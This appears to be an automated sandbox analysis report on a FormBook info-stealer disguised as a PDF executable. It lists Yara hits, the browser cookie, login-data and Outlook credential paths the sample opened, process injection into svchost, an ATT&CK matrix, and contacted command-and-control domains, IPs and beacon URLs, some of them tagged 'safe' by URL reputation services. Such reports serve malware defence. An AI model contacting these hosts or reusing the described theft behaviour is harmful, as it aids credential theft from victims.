            Source: EyHLOQmzGKBL.exe, 0000000B.00000000.1684358268.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3157562461.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158649189.0000000000DE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: EyHLOQmzGKBL.exe, 0000000B.00000000.1684358268.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3157562461.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158649189.0000000000DE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: Product Data Specifications_PDF.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,6_2_004720DB
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00472C3F GetUserNameW,6_2_00472C3F
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,6_2_0041E364
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,6_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\cmdl32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Product Data Specifications_PDF.exeBinary or memory string: WIN_XP
            Source: Product Data Specifications_PDF.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: Product Data Specifications_PDF.exeBinary or memory string: WIN_XPe
            Source: Product Data Specifications_PDF.exeBinary or memory string: WIN_VISTA
            Source: Product Data Specifications_PDF.exeBinary or memory string: WIN_7
            Source: Product Data Specifications_PDF.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,6_2_004652BE
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00476619
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,6_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519456 Sample: Product Data Specifications... Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 28 www.mktimediato.online 2->28 30 www.dfmagazine.shop 2->30 32 6 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 6 other signatures 2->48 10 Product Data Specifications_PDF.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 13 svchost.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 EyHLOQmzGKBL.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 cmdl32.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 EyHLOQmzGKBL.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.trapkitten.website 195.161.68.8, 49704, 80 RTCOMM-ASRU Russian Federation 22->34 36 www.qwefs.org 45.114.171.236, 49706, 49707, 49708 POWERLINE-AS-APPOWERLINEDATACENTERHK Hong Kong 22->36 38 4 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Product Data Specifications_PDF.exe55%ReversingLabsWin32.Trojan.AbuseCommBack
            Product Data Specifications_PDF.exe100%AviraHEUR/AGEN.1321671
            Product Data Specifications_PDF.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.kevin-torkelson.info/__media__/js/trademark.php?d=kevin-torkelson.info&type=ns0%Avira URL Cloudsafe
            http://www.qwefs.org/toq1/?Z0=uFBHOFjbtFvxqkces1RGqIZYNgmiur5XIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjA2HLhLGNIPNt7CZLxVcbhsRd+xmlQzDGNJYRcWCQEWce52MF6lNTmRQD&fRr0=tfAptZ0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
            https://cdn.consentmanager.net0%Avira URL Cloudsafe
            https://dts.gnpge.com0%Avira URL Cloudsafe
            http://www.dfmagazine.shop/wc8m/0%Avira URL Cloudsafe
            http://www.Kevin-torkelson.info0%Avira URL Cloudsafe
            http://www.kevin-torkelson.info/Anti_Wrinkle_Creams.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaa0%Avira URL Cloudsafe
            http://www.kevin-torkelson.info/High_Speed_Internet.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaa0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe
            http://www.mandemj.top0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
            http://www.kevin-torkelson.info/fashion_trends.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZHr0%Avira URL Cloudsafe
            http://www.trapkitten.website/vzgx/?fRr0=tfAptZ&Z0=fAt7pIVPpGXAvBzcGITPA7OHGvP4drUtR0TDZSipM2iZbUNyxYUxCE+UHA0v6t9lkzzVyERFWiUA+TPVxmGbgZvp38A33fVcU72oeaDS2r7GjI1g6DEPKEsN3N2XW07UJj8EjHQ8jzqg0%Avira URL Cloudsafe
            http://www.kevin-torkelson.info/gekb/?Z0=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWA67inr6j8yvx+6PXqz9iyZ5+RA70tZ4RmMUT5lyJ2S3VdPbvKQVdTVJ&fRr0=tfAptZ0%Avira URL Cloudsafe
            http://www.kevin-torkelson.info/Parental_Control.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZ0%Avira URL Cloudsafe
            http://www.kevin-torkelson.info/__media__/design/underconstructionnotice.php?d=kevin-torkelson.info0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
            https://delivery.consentmanager.net0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
            http://www.mandemj.top/to69/?Z0=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB9gkhdqEj3u6wGNYEX9l8USgN38burlDvemyCHtOx57idtfraeuBs8os&fRr0=tfAptZ0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
            https://jino.ru0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
            http://www.kevin-torkelson.info/All_Inclusive_Vacation_Packages.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2F0%Avira URL Cloudsafe
            http://www.disn-china.buzz/za6x/0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
            http://www.disn-china.buzz/za6x/?fRr0=tfAptZ&Z0=EgAkyEJNK52+6mt0ZZzaOaTRCjAqhTrWwvgRo5oIQtO9ZSuXgOHTRb0W4iTGk1GYFMCByhdBFH2COuTwpe8yjCAk5/Of1W40SqKn8hyiq9h4asN2CcaU88uOnsZx5gwZ1TVihW9sV3GM0%Avira URL Cloudsafe
            http://www.kevin-torkelson.info/gekb/0%Avira URL Cloudsafe
            http://www.mandemj.top/to69/0%Avira URL Cloudsafe
            http://www.qwefs.org/toq1/0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.qwefs.org
            		45.114.171.236
            		truefalse
              		unknown
              www.mandemj.top
              		162.0.238.43
              		truefalse
                		unknown
                www.trapkitten.website
                		195.161.68.8
                		truefalse
                  		unknown
                  www.disn-china.buzz
                  		161.97.168.245
                  		truefalse
                    		unknown
                    dfmagazine.shop
                    		84.32.84.32
                    		truefalse
                      		unknown
                      www.kevin-torkelson.info
                      		208.91.197.27
                      		truefalse
                        		unknown
                        www.dfmagazine.shop
                        		unknown
                        		unknowntrue
                          		unknown
                          www.mktimediato.online
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.qwefs.org/toq1/?Z0=uFBHOFjbtFvxqkces1RGqIZYNgmiur5XIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjA2HLhLGNIPNt7CZLxVcbhsRd+xmlQzDGNJYRcWCQEWce52MF6lNTmRQD&fRr0=tfAptZfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.dfmagazine.shop/wc8m/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.trapkitten.website/vzgx/?fRr0=tfAptZ&Z0=fAt7pIVPpGXAvBzcGITPA7OHGvP4drUtR0TDZSipM2iZbUNyxYUxCE+UHA0v6t9lkzzVyERFWiUA+TPVxmGbgZvp38A33fVcU72oeaDS2r7GjI1g6DEPKEsN3N2XW07UJj8EjHQ8jzqgfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.kevin-torkelson.info/gekb/?Z0=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWA67inr6j8yvx+6PXqz9iyZ5+RA70tZ4RmMUT5lyJ2S3VdPbvKQVdTVJ&fRr0=tfAptZfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.mandemj.top/to69/?Z0=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB9gkhdqEj3u6wGNYEX9l8USgN38burlDvemyCHtOx57idtfraeuBs8os&fRr0=tfAptZfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.disn-china.buzz/za6x/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.kevin-torkelson.info/gekb/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.qwefs.org/toq1/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.mandemj.top/to69/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.disn-china.buzz/za6x/?fRr0=tfAptZ&Z0=EgAkyEJNK52+6mt0ZZzaOaTRCjAqhTrWwvgRo5oIQtO9ZSuXgOHTRb0W4iTGk1GYFMCByhdBFH2COuTwpe8yjCAk5/Of1W40SqKn8hyiq9h4asN2CcaU88uOnsZx5gwZ1TVihW9sV3GMfalse
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabcmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://dts.gnpge.comEyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/ac/?q=cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.kevin-torkelson.info/__media__/js/trademark.php?d=kevin-torkelson.info&type=nscmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/pics/28903/search.png)cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cdn.consentmanager.netcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.Kevin-torkelson.infocmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.kevin-torkelson.info/Anti_Wrinkle_Creams.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaacmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.kevin-torkelson.info/High_Speed_Internet.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaacmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
